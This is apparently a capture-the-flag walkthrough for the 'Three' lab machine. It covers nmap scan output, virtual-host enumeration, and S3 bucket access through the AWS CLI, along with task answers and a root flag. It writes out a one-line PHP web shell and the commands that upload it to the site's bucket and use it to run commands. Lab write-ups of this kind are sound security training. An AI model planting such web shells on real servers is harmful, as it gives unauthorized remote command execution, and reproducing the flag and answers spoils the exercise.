Three
Task #1: How many TCP ports are open?
-
A: 2
-
nmap -sC -sV -p- -T5 -v 10.129.202.49
$ nmap -sC -sV -p- -T5 -vv 10.129.202.49 Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 15:18 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed Initiating Ping Scan at 15:18 Scanning 10.129.202.49 [2 ports] Completed Ping Scan at 15:18, 0.27s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:18 Completed Parallel DNS resolution of 1 host. at 15:18, 0.01s elapsed Initiating Connect Scan at 15:18 Scanning 10.129.202.49 [65535 ports] Discovered open port 22/tcp on 10.129.202.49 Discovered open port 80/tcp on 10.129.202.49 Warning: 10.129.202.49 giving up on port because retransmission cap hit (2). Completed Connect Scan at 15:18, 11.89s elapsed (65535 total ports) Initiating Service scan at 15:18 Scanning 2 services on 10.129.202.49 Completed Service scan at 15:18, 6.28s elapsed (2 services on 1 host) NSE: Script scanning 10.129.202.49. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 3.39s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.48s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed Nmap scan report for 10.129.202.49 Host is up, received conn-refused (0.016s latency). Scanned at 2022-12-13 15:18:09 EST for 22s Not shown: 60242 closed ports, 5291 filtered ports Reason: 60242 conn-refused and 5291 no-responses PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf | 256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI= | 256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: The Toppers Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:18 Completed NSE at 15:18, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds
Task #2: What is the domain of the email address provided in the "Contact" section of the website?
- A: thetoppers.htb
Task #3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
- A:
/etc/hosts
Task #4: Which sub-domain is discovered during further enumeration?
- A:
s3.thetoppers.htb
- Add
10.129.202.49 thetoppers.htb
to/etc/hosts
gobuster vhost -u thetoppers.htb -w subdomains.txt
Task #5: Which service is running on the discovered sub-domain?
- A:
Amazon S3
- Add
s3.thetoppers.htb
to/etc/hosts
Task #6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
- A:
awscli
Task #7: Which command is used to set up the AWS CLI installation?
- A:
aws configure
sudo apt install awscli
Task #8: What is the command used by the above utility to list all of the S3 buckets?
- A:
aws s3 ls
- Enter some random values for the access key and secret key so the commands will run
Task #9: This server is configured to run files written in what web scripting language?
- A:
PHP
Root flag: a980d99281a28d638ac68b9bf9453c2b
-
aws --endpoint http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
shows us an.htaccess
file and anindex.php
file -
Create a PHP payload to run commands with
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Then upload it to the bucket with
aws --endpoint http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb
-
Run the
ls
command to test. It works, so try runningls ../
to see the next directory up. That shows aflag.txt
file, which we can view withcat ../flag.txt